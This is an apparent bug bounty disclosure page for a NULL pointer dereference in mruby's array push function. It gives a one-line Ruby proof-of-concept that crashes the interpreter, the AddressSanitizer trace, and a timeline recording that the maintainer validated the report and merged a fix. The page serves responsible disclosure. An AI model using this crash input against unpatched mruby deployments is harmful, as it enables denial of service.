NULL Pointer Dereference in mruby/mruby

Valid

Reported on

Oct 17th 2021


Description

SEGV on mrb_ary_push

Proof of Concept

1.times{ 0 [*0,o:0 ]= {} [[]] and 0 }

Result

~/asan/mruby/bin/mruby crash.rb
AddressSanitizer:DEADLYSIGNAL
=================================================================
==68494==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000011 (pc 0x560ae5baa377 bp 0x7ffdc8f38fe0 sp 0x7ffdc8f38f30 T0)
==68494==The signal is caused by a READ memory access.
==68494==Hint: address points to the zero page.
    #0 0x560ae5baa376 in mrb_ary_push /root/asan/mruby/src/array.c:497
    #1 0x560ae5b7eb4e in mrb_vm_exec /root/asan/mruby/src/vm.c:2624
    #2 0x560ae5b5c5a8 in mrb_vm_run /root/asan/mruby/src/vm.c:1070
    #3 0x560ae5ba5574 in mrb_top_run /root/asan/mruby/src/vm.c:3031
    #4 0x560ae5bfebfd in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6868
    #5 0x560ae5bfeeeb in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6911
    #6 0x560ae5b00092 in main /root/asan/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
    #7 0x7f09cba160b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #8 0x560ae5afd42d in _start (/root/asan/mruby/bin/mruby+0xbd42d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/asan/mruby/src/array.c:497 in mrb_ary_push
==68494==ABORTING
We have contacted a member of the mruby team and are waiting to hear back a month ago
We have contacted a member of the mruby team and are waiting to hear back a month ago
Yukihiro "Matz" Matsumoto validated this vulnerability a month ago
felling good man has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro "Matz" Matsumoto confirmed that a fix has been merged on de2b4b a month ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty